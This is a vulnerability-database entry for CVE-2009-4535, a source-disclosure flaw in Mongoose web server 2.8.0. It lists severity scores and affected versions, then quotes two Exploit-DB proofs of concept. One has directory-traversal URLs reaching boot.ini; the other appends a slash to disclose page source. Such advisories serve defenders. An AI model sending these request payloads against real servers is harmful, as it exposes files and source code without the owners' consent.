CVE-2009-4535
published 2009-12-31CVE-2009-4535: Mongoose 2.8.0 and earlier allows remote attackers to obtain the source code for a web page by appending a / (slash) character to the URI.
PriorityP430medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
6.68%
93.1th percentile
Mongoose 2.8.0 and earlier allows remote attackers to obtain the source code for a web page by appending a / (slash) character to the URI.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| valenok | mongoose | <= 2.8.0 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Mongoose Web Server 2.8 - Multiple Directory Traversals
exploitdb·2010-04-20
CVE-2009-4535 Mongoose Web Server 2.8 - Multiple Directory Traversals
Mongoose Web Server 2.8 - Multiple Directory Traversals
---
################################################################
#
# Mongoose Web Server v2.8 Multiple Directory Traversal Exploits
# Found By: Dr_IDE
# Date: Apr. 20, 2010
# Tested On: Windows 7
# Download: http://code.google.com/p/mongoose/downloads/list
#
################################################################
- Description -
Mongoose v2.8 is a Windows based HTTP server. This is the latest
version of the application available.
Mongoose v2.8 is vulnerable to many remote directory traversal attacks.
- Technical Details -
http://172.16.2.102//..%5C..%5C%5C..%5C..%5C%5C..%5C..%5C%5C..%5C..%5Cboot.ini
http://172.16.2.102/..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
http://172.16.2.102/..%5C..%5Cboot.ini
#[pocoftheday.
Exploit-DB
Mongoose Web Server 2.8 - Source Disclosure
exploitdb·2009-10-23
CVE-2009-4535 Mongoose Web Server 2.8 - Source Disclosure
Mongoose Web Server 2.8 - Source Disclosure
---
#######################################################
#
# Mongoose Web Server <= 2.8.0 Remote Source Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: http://code.google.com/p/mongoose/
#
#######################################################
- Description -
Mongoose Web Server <= 2.8.0 is a Windows based HTTP server.
This is the latest version of the application available.
Mongoose is vulnerable to remote arbitrary source code
disclosure by the following means.
- Technical Details -
http://[ webserver IP][:port]/[ file ][/]
http://172.16.2.101:8080/index.html/
http://172.16.2.101:8080/index.php/
#[pocoftheday.blogspot.com]
No writeups or analysis indexed.
http://freetexthost.com/0lcsrgt3vwhttp://pocoftheday.blogspot.com/2009/10/mongoose-web-server-v280-remote-source_22.htmlhttp://secunia.com/advisories/36934http://freetexthost.com/0lcsrgt3vwhttp://pocoftheday.blogspot.com/2009/10/mongoose-web-server-v280-remote-source_22.htmlhttp://secunia.com/advisories/36934
2009-12-31
Published